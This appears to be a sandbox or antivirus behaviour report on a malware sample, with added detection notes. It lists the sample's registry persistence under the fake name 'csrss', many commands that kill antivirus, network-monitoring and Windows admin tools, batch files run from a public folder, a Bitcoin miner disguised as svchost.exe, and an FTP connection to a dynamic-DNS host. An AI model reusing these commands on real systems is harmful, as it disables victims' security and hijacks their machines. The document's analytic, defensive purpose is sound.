Technical Information
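- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'csrss' = 'C:\Users\Public\smxss.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'csrss' = 'C:\Users\Public\smxss.exe'
  Note: both values are autorun (Run key) entries, so the file is launched again at logon; they correspond to the two reg.exe add commands listed further down. The value name 'csrss' is the name of a genuine Windows system process, while the data points to an executable in the user-writable C:\Users\Public folder. A Run value named after a system component whose path lies outside <SYSTEM32> is worth alerting on.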
- <SYSTEM32>\taskkill.exe /f /im mcvsshld.exe
- <SYSTEM32>\tskill.exe /A mcupdate
- <SYSTEM32>\taskkill.exe /f /im md.exe
- <SYSTEM32>\tskill.exe /A monitor
- <SYSTEM32>\tskill.exe /A md
- <SYSTEM32>\taskkill.exe /f /im mcmnhdlr.exe
- <SYSTEM32>\tskill.exe /A mcmnhdlr
- <SYSTEM32>\taskkill.exe /f /im mctool.exe
- <SYSTEM32>\taskkill.exe /f /im mcupdate.exe
- <SYSTEM32>\tskill.exe /A mctool
- <SYSTEM32>\tskill.exe /A nod32
- <SYSTEM32>\tskill.exe /A nprotect
- <SYSTEM32>\tskill.exe /A notstart
- <SYSTEM32>\cmd.exe /c C:\Users\Public\cpx.bat
- <SYSTEM32>\taskkill.exe /f /im clean.exe
- <SYSTEM32>\taskkill.exe /f /im f-prot.exe
- <SYSTEM32>\tskill.exe /A normist
- <SYSTEM32>\taskkill.exe /f /im nod32.exe
- <SYSTEM32>\taskkill.exe /f /im normist.exe
- <SYSTEM32>\taskkill.exe /f /im norton*.exe
- <SYSTEM32>\tskill.exe /A norton*
- <SYSTEM32>\taskkill.exe /f /im blackice.exe
- <SYSTEM32>\tskill.exe /A blackice
- <SYSTEM32>\tskill.exe /A bidef
- <SYSTEM32>\tskill.exe /A bidserver
- <SYSTEM32>\taskkill.exe /f /im bidef.exe
- <SYSTEM32>\tskill.exe /A avltmain
- <SYSTEM32>\taskkill.exe /f /im avkwctl9.exe
- <SYSTEM32>\taskkill.exe /f /im avltmain.exe
- <SYSTEM32>\taskkill.exe /f /im avwin.exe
- <SYSTEM32>\tskill.exe /A avwin
- <SYSTEM32>\taskkill.exe /f /im bidserver.exe
- <SYSTEM32>\tskill.exe /A mapisvc32
- <SYSTEM32>\taskkill.exe /f /im icmon.exe
- <SYSTEM32>\taskkill.exe /f /im mapisvc32.exe
- <SYSTEM32>\taskkill.exe /f /im mcagent.exe
- <SYSTEM32>\tskill.exe /A mcagent
- <SYSTEM32>\tskill.exe /A cleanpc
- <SYSTEM32>\tskill.exe /A clean
- <SYSTEM32>\taskkill.exe /f /im cleanpc.exe
- <SYSTEM32>\tskill.exe /A ctrl
- <SYSTEM32>\taskkill.exe /f /im click.exe
- <SYSTEM32>\tskill.exe /A cleaner
- <SYSTEM32>\tskill.exe /A espwatch
- <SYSTEM32>\taskkill.exe /f /im escanv95.exe
- <SYSTEM32>\taskkill.exe /f /im espwatch.exe
- <SYSTEM32>\taskkill.exe /f /im etrustcipe.exe
- <SYSTEM32>\tskill.exe /A etrustcipe
- <SYSTEM32>\taskkill.exe /f /im ecengine.exe
- <SYSTEM32>\tskill.exe /A ecengine
- <SYSTEM32>\tskill.exe /A escanhnt
- <SYSTEM32>\tskill.exe /A escanv95
- <SYSTEM32>\taskkill.exe /f /im escanhtn.exe
- <SYSTEM32>\tskill.exe /A f-stopw
- <SYSTEM32>\tskill.exe /A mcshield
- <SYSTEM32>\tskill.exe /A ccleaner
- <SYSTEM32>\taskkill.exe /f /im mcshield.exe
- <SYSTEM32>\taskkill.exe /f /im monitor.exe
- <SYSTEM32>\tskill.exe /A mcvsrte
- <SYSTEM32>\taskkill.exe /f /im guard
- <SYSTEM32>\taskkill.exe /f /im f-stopw.exe
- <SYSTEM32>\taskkill.exe /f /im guarddog.exe
- <SYSTEM32>\tskill.exe /A icmon
- <SYSTEM32>\tskill.exe /A guarddog
- <SYSTEM32>\tskill.exe /A wireshark
- <SYSTEM32>\taskkill.exe /f /im connectionmonitor.exe
- <SYSTEM32>\taskkill.exe /f /im wireshark.exe
- <SYSTEM32>\taskkill.exe /f /im cmgrdian.exe
- <SYSTEM32>\tskill.exe /A cmgrdian
- <SYSTEM32>\tskill.exe /A cleaner3
- <SYSTEM32>\taskkill.exe /f /im cleaner.exe
- <SYSTEM32>\taskkill.exe /f /im cleaner3.exe
- <SYSTEM32>\tskill.exe /A connectionmonitor
- <SYSTEM32>\taskkill.exe /f /im ctrl.exe
- <SYSTEM32>\tskill.exe /A cmesys
- <SYSTEM32>\tskill.exe /A ethereal
- <SYSTEM32>\taskkill.exe /f /im deputy.exe
- <SYSTEM32>\taskkill.exe /f /im ethereal.exe
- <SYSTEM32>\taskkill.exe /f /im esafe.exe
- <SYSTEM32>\tskill.exe /A esafe
- <SYSTEM32>\tskill.exe /A defwatch
- <SYSTEM32>\taskkill.exe /f /im cmesys.exe
- <SYSTEM32>\taskkill.exe /f /im defwatch.exe
- <SYSTEM32>\tskill.exe /A deputy
- <SYSTEM32>\taskkill.exe /f /im defscangui.exe
- <SYSTEM32>\taskkill.exe /f /im AAWService.exe
- <SYSTEM32>\tskill.exe /A mbam
- <SYSTEM32>\tskill.exe /A AAWService
- <SYSTEM32>\tskill.exe /A AAWTray
- <SYSTEM32>\taskkill.exe /f /im AAWTray.exe
- <SYSTEM32>\tskill.exe /A SUpdate
- <SYSTEM32>\taskkill.exe /f /im SUpdate.exe
- <SYSTEM32>\taskkill.exe /f /im Update.exe
- <SYSTEM32>\taskkill.exe /f /im mbam.exe
- <SYSTEM32>\tskill.exe /A Update
- <SYSTEM32>\net.exe stop aawservice
- <SYSTEM32>\tskill.exe /A fuckyou
- <SYSTEM32>\taskkill.exe /f /im avp.exe
- <SYSTEM32>\tskill.exe /A avp
- <SYSTEM32>\taskkill.exe /f /im MSASCui.exe
- <SYSTEM32>\tskill.exe /A MSASCui
- <SYSTEM32>\tskill.exe /A Ad-Aware
- <SYSTEM32>\taskkill.exe /f /im Ad-Aware.exe
- <SYSTEM32>\taskkill.exe /f /im threatwork.exe
- <SYSTEM32>\net1.exe stop aawservice
- <SYSTEM32>\tskill.exe /A threatwork
- <SYSTEM32>\reg.exe add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v csrss /d C:\Users\Public\smxss.exe /f
- <SYSTEM32>\cmd.exe /c C:\Users\Public\instmnr.bat
- <SYSTEM32>\tskill.exe /A taskmgr
- <SYSTEM32>\tskill.exe /A regedit
- <SYSTEM32>\taskkill.exe /f /im taskmgr.exe
- <SYSTEM32>\tskill.exe /A smxss
- <SYSTEM32>\cmd.exe /c C:\mkxxosrw.bat
- <SYSTEM32>\taskkill.exe /f /im smxss.exe
- <SYSTEM32>\reg.exe add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v csrss /d C:\Users\Public\smxss.exe /f
- <SYSTEM32>\cmd.exe /c C:\Users\Public\aiasodjfapughaw.bat
- <SYSTEM32>\taskkill.exe /f /im <Virus name>.exe
- <SYSTEM32>\tskill.exe /A TeaTimer
- <SYSTEM32>\taskkill.exe /f /im TeaTimer.exe
- <SYSTEM32>\taskkill.exe /f /im SpybotSD.exe
- <SYSTEM32>\tskill.exe /A SpybotSD
- <SYSTEM32>\taskkill.exe /f /im msconfig.exe
- <SYSTEM32>\cmd.exe /c C:\Users\Public\load.bat
- <SYSTEM32>\taskkill.exe /f /im regedit.exe
- <SYSTEM32>\tskill.exe /A msconfig
- <SYSTEM32>\tskill.exe /A <Virus name>
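- <SYSTEM32>\svchost.exe -T 98 -o http://Je############uckerhead:x@mine3.btcguild.com:8332/
  Note: these arguments appear to be those of a Bitcoin mining client pointed at a mining-pool endpoint (credentials embedded in the URL, port 8332), not those of a Windows service host. A genuine svchost.exe is started by services.exe with -k <service group>, so a svchost.exe process carrying a URL on its command line is a strong detection signal. The listing does not show how the miner code came to run under this process name.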
- <SYSTEM32>\tskill.exe /A _avp32
- <SYSTEM32>\tskill.exe /A avgserv
- <SYSTEM32>\taskkill.exe /f /im avgrsx.exe
- <SYSTEM32>\taskkill.exe /f /im avgserv.exe
- <SYSTEM32>\taskkill.exe /f /im avgserv9.exe
- <SYSTEM32>\tskill.exe /A avgserv9
- <SYSTEM32>\taskkill.exe /f /im avgemc.exe
- <SYSTEM32>\tskill.exe /A avgemc
- <SYSTEM32>\tskill.exe /A avgnt
- <SYSTEM32>\tskill.exe /A avgrsx
- <SYSTEM32>\taskkill.exe /f /im avgnt.exe
- <SYSTEM32>\tskill.exe /A avguard
- <SYSTEM32>\taskkill.exe /f /im avkserv.exe
- <SYSTEM32>\tskill.exe /A avkserv
- <SYSTEM32>\tskill.exe /A avkservice
- <SYSTEM32>\tskill.exe /A avkwctl9
- <SYSTEM32>\taskkill.exe /f /im avkservice.exe
- <SYSTEM32>\tskill.exe /A avgw
- <SYSTEM32>\taskkill.exe /f /im avguard.exe
- <SYSTEM32>\taskkill.exe /f /im avgw.exe
- <SYSTEM32>\taskkill.exe /f /im avkpop.exe
- <SYSTEM32>\tskill.exe /A avkpop
- <SYSTEM32>\tskill.exe /A agentsvr
- <SYSTEM32>\tskill.exe /A alertsvc
- <SYSTEM32>\taskkill.exe /f /im agentsvr.exe
- <SYSTEM32>\taskkill.exe /f /im amon9x.exe
- <SYSTEM32>\tskill.exe /A amon9x
- <SYSTEM32>\tskill.exe /A _avpcc
- <SYSTEM32>\taskkill.exe /f /im _avp32.exe
- <SYSTEM32>\taskkill.exe /f /im _avpcc.exe
- <SYSTEM32>\taskkill.exe /f /im _avpm
- <SYSTEM32>\tskill.exe /A _avpm
- <SYSTEM32>\tskill.exe /A autotrace
- <SYSTEM32>\tskill.exe /A avgcc32
- <SYSTEM32>\taskkill.exe /f /im ave32.exe
- <SYSTEM32>\taskkill.exe /f /im avgcc32.exe
- <SYSTEM32>\taskkill.exe /f /im avgctrl.exe
- <SYSTEM32>\tskill.exe /A avgctrl
- <SYSTEM32>\tskill.exe /A avconsol
- <SYSTEM32>\taskkill.exe /f /im autotrace.exe
- <SYSTEM32>\taskkill.exe /f /im avconsol.exe
- <SYSTEM32>\taskkill.exe /f /im fuckyou.exe
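- <SYSTEM32>\tskill.exe /A ave32
  Note: the taskkill.exe and tskill.exe commands above target antivirus and anti-spyware processes, the network analyzers wireshark and ethereal, and the Windows tools taskmgr, regedit and msconfig, together with one net.exe stop of an anti-spyware service. A single parent process issuing many such kill commands in a short time, paired with cmd.exe running batch files from C:\Users\Public, is a usable behavioural indicator even when the file names change.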
- AVGCTRL.EXE
- <SYSTEM32>\drwtsn32.exe
- AVGCTRL.EXE
- MCAGENT.EXE
- nod32.exe
- AVP.COM
- AVP.EXE
- AVGCC32.EXE
- C:\Users\Public\load.bat
- C:\Users\Public\ojgasog.bat
- C:\Users\Public\ar.i
- <Auxiliary element>
- C:\Users\Public\cpx.bat
- C:\Users\Public\instlx9xz7b8x.txt
- C:\mkxxosrw.bat
- C:\Users\Public\aiasodjfapughaw.bat
- C:\Users\Public\instmnr.bat
- C:\Users\Public\smxss.exe
- %TEMP%\f64c_appcompat.txt
- %TEMP%\a30d_appcompat.txt
- C:\Users\Public\smxss.exe
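- 'jb###.zapto.org':21
- 'localhost':1035
- DNS ASK jb###.zapto.org
  Note: port 21 is the FTP control port, and zapto.org is a dynamic-DNS domain, so the address behind the host name can change. Block or alert on the host name (DNS query and connection) rather than on a resolved IP address. The host name is partly masked in this listing.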
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: 'Indicator' WindowName: ''
- ClassName: '' WindowName: ''